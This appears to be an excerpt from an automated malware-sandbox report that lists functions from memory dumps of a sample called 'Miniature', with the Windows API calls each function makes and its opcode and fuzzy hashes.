                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LoadString$__swprintf
                                                  • String ID:
                                                  • API String ID: 207118244-0
                                                  • Opcode ID: 636fdb410ab9c05154c45c6a3e7d20fa2f36495cab8a0e3ab08ee58f1fddf831
                                                  • Instruction ID: 3db41a3042f191e1f64fbba57eb0bb40e7487e866cc8325032a98520977060b8
                                                  • Opcode Fuzzy Hash: 636fdb410ab9c05154c45c6a3e7d20fa2f36495cab8a0e3ab08ee58f1fddf831
                                                  • Instruction Fuzzy Hash: E0B17E74A0010ADFEB15EF98C841DFEB7B5FF48710F10819AF915A7291EB75AA41CB50
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                  • Instruction ID: 65dce9f4a72332c7fd5b22f8701c8738daf6600503d811ff4c4a83544b83827f
                                                  • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                  • Instruction Fuzzy Hash: 2261BB71A002069FEB10DF54C881BBAB7E6FF44310F15806AE91A9B291D774ED81EB91
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97c489199a0dd3f9316407970041e62a1dacedc7f3f419c8961a321abf77923e
                                                  • Instruction ID: 1cf9330d4dba2730290ed331785b94ff8553fb752fb26ac8a75c0f57cf2ba902
                                                  • Opcode Fuzzy Hash: 97c489199a0dd3f9316407970041e62a1dacedc7f3f419c8961a321abf77923e
                                                  • Instruction Fuzzy Hash: F951C271B00604AFDF14EB64CD95FAE77A6AF85720F194058F806AB392CB38ED05EB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                  • Instruction ID: a7f6f7c14ae6bd6c4bbfdd83c2d5f406f244f44dcf75a474fd3126cb8fee4060
                                                  • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                  • Instruction Fuzzy Hash: 7131B4B9A04A02DFC724DF19D490A62F7A0FF4A360714C569FD8A8B755DB30ED81EB90
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00FA41B2
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 1708b0b233b373b0597b165b263700eacb5d00400653b9891592af6368f959eb
                                                  • Instruction ID: 5466ede61694e5d8e5381c43f2dc70d1db8bae42231574fe35b7e12b546620be
                                                  • Opcode Fuzzy Hash: 1708b0b233b373b0597b165b263700eacb5d00400653b9891592af6368f959eb
                                                  • Instruction Fuzzy Hash: E93181B1A00756AFCB19CF2DC880A5DB7B5FF95324F148629E81593714D7B0BDA0DB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 149486335167abd43f55a255b6bd16981b834501b3d5efedf9f00f0e0708d1ba
                                                  • Instruction ID: bb347a3f764cc7b90b1c6416f73dab72b2654dce603137116ff36bb55f83096c
                                                  • Opcode Fuzzy Hash: 149486335167abd43f55a255b6bd16981b834501b3d5efedf9f00f0e0708d1ba
                                                  • Instruction Fuzzy Hash: AA410974908351CFEB24DF14C594B1ABBE1BF45318F1988ACE4898B362C336E885DB52
                                                  APIs
                                                    • Part of subcall function 00FA4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4B63
                                                    • Part of subcall function 00FB547B: __wfsopen.LIBCMT ref: 00FB5486
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FA27AF,?,00000001), ref: 00FA49F4
                                                    • Part of subcall function 00FA4ADE: FreeLibrary.KERNEL32(00000000), ref: 00FA4B18
                                                    • Part of subcall function 00FA48B0: _memmove.LIBCMT ref: 00FA48FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: be88fca308adea837b69556b2362d5809225c0775f52a131a06e315745756c3e
                                                  • Instruction ID: 36ce007b2c346141f6c7645b961b5c84147a8ee4579011b9730e4ccb3c2de699
                                                  • Opcode Fuzzy Hash: be88fca308adea837b69556b2362d5809225c0775f52a131a06e315745756c3e
                                                  • Instruction Fuzzy Hash: BF11C472650209ABCB14EF60CC02FAE77A99F82711F10842DF541A6191EEFDAA15BB94
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: f5a7e3d1c0f1e1028fcf0736de59a15b25b8c531c7aa9cc9a7ee68f4a3c205fa
                                                  • Instruction ID: a420fedeefb1c374748c01c0c0c1d5989b9a9f539fffd5c7da305fc0198e34d0
                                                  • Opcode Fuzzy Hash: f5a7e3d1c0f1e1028fcf0736de59a15b25b8c531c7aa9cc9a7ee68f4a3c205fa
                                                  • Instruction Fuzzy Hash: 322124B4908341DFDB24DF14C854B1ABBE1BF88714F05896CF88A97362C735E849EB92
                                                  APIs
                                                  • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00FA3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FA4276
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 018e867afdb69e160fc45a3b54c063a2959bc5483356f8c4171c78456195f101
                                                  • Instruction ID: c5a46f05cbba4747f5e9dddafbccae31fad640f0203b042a31e2321f797800f7
                                                  • Opcode Fuzzy Hash: 018e867afdb69e160fc45a3b54c063a2959bc5483356f8c4171c78456195f101
                                                  • Instruction Fuzzy Hash: F9113AB1600B019FE330CF55C480B62B7F9EF89720F10C92DE8AA86A40D7B5F845EB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                  • Instruction ID: eb69a1fa9a4aca0ce12b8b7a243b51d9926ee48b25aafdecfb4718023bd164e2
                                                  • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                  • Instruction Fuzzy Hash: 1801D6B36017016ED3245B39DC06BB7BB98EB457A0F11862AF51ACA1D1EA35E440AB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                  • Instruction ID: 1237ba2adeaa2dd39a58fd5bf7de25b8ea9b90fa118f7b501283599ca7b4b971
                                                  • Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                  • Instruction Fuzzy Hash: D301D6322002256BCB14DF2ECC9196BB7A9EFC6364714852EF80ACB205EA31E801C790
                                                  APIs
                                                    • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                    • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                  • _memset.LIBCMT ref: 00FF7CB4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw_memsetstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 525207782-0
                                                  • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                  • Instruction ID: 505e9f082e3e4ed50e872a168f1fd49da18565f93dca638611527d2779af11ba
                                                  • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                  • Instruction Fuzzy Hash: 2101F6756082049FD321EF5DD941F56BBE1EF59310F24845AF5888B3A2DB76E801EF90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _fseek
                                                  • String ID:
                                                  • API String ID: 2937370855-0
                                                  • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                  • Instruction ID: 2cdfe8d2201032738957f5ed535c17c43deda84629f879e4c9f4bfe20ba61979
                                                  • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                  • Instruction Fuzzy Hash: 32F08CB6400208FFDF108F45DC00DEF7B7DEB85720F004198F9045A211D272EA21ABB0
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,?,00FA27AF,?,00000001), ref: 00FA4A63
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: ad1fe135c02aa8f57e83a7ce9c417d4f734063c47a6a524957e5768b29e6a7a4
                                                  • Instruction ID: 6c54fa1ed5f576709eafe7b06eb9f8af503847e17bd70dcea541cda43365c7db
                                                  • Opcode Fuzzy Hash: ad1fe135c02aa8f57e83a7ce9c417d4f734063c47a6a524957e5768b29e6a7a4
                                                  • Instruction Fuzzy Hash: FBF030B2545701CFCB349F64D490816BBF4BF55325324893EE1D783610C7BAA984EF44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                  • Instruction ID: dc6c6b842182d5688254fc694c6ce379f78f65c424b4bc4c75eadc945675f3fa
                                                  • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                  • Instruction Fuzzy Hash: 05F0F87240020DFFDF05CF90C941EAABB79FB15314F208589F9198A252D776EA61EB91
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB09E4
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: f7ace85b21de5d6d7dc07cd0665f94e2e04259a87a1f22930fe5549b6cdecff9
                                                  • Instruction ID: cf22f0f91edab0cd13d29573ecd66cf54f207e6bbd0750b3b976c30510067d7e
                                                  • Opcode Fuzzy Hash: f7ace85b21de5d6d7dc07cd0665f94e2e04259a87a1f22930fe5549b6cdecff9
                                                  • Instruction Fuzzy Hash: 5BE0863290022857C72195989C06FEA77DDEF89690F0541B6FC08D7208D9699C9186D1
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00FF4D31
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FolderPath_memmove
                                                  • String ID:
                                                  • API String ID: 3334745507-0
                                                  • Opcode ID: 0414b42d7a1ac5872604e02c937e0ed1b7f7a1a01d38469eb14c973660e6e7ad
                                                  • Instruction ID: 3c75e3ad9ac024822c77a0d2b58695b3d60121439519db4e244899b48ea6b15f
                                                  • Opcode Fuzzy Hash: 0414b42d7a1ac5872604e02c937e0ed1b7f7a1a01d38469eb14c973660e6e7ad
                                                  • Instruction Fuzzy Hash: ABD05EB190032C2BDB70EAA49C0DDB77BACE744224F0006A1BCACC3105ED28AD4586E0
                                                  APIs
                                                    • Part of subcall function 00FF384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00FF3959,00000000,00000000,?,00FE05DB,01048070,00000002,?,?), ref: 00FF38CA
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00FE05DB,01048070,00000002,?,?,?,00000000), ref: 00FF3967
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID:
                                                  • API String ID: 539440098-0
                                                  • Opcode ID: 6d6c8918516e259e9d3b5f59329ee0298dba35f166950c1720ce9ce471386a20
                                                  • Instruction ID: 587cdaf7e4ac64e38697859c08f445b8a5add5fbdb39d1cf010d99ecaef9b8d1
                                                  • Opcode Fuzzy Hash: 6d6c8918516e259e9d3b5f59329ee0298dba35f166950c1720ce9ce471386a20
                                                  • Instruction Fuzzy Hash: A9E04636400208BBDB20AF94D801A9ABBBCEF04320F10465AFD4092111DBB6AE24ABA0
                                                  APIs
                                                  • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00FF3E7D,?,?,?), ref: 00FF3F0D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  • Opcode ID: 9483694ae17ce975819d3b747d93a2d9ffedeef00a64315958ece3f0f7767782
                                                  • Instruction ID: da4fd54524c211bd69526c156eb1a8d923ca62990e71307510a13c9440d2016b
                                                  • Opcode Fuzzy Hash: 9483694ae17ce975819d3b747d93a2d9ffedeef00a64315958ece3f0f7767782
                                                  • Instruction Fuzzy Hash: 7AD0A7315E020CBBEF60DEA0CC02F68B7ACE702706F2002A4F504D90D0DA7669189795
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00FE06E6,00000000,00000000,00000000), ref: 00FA42BF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
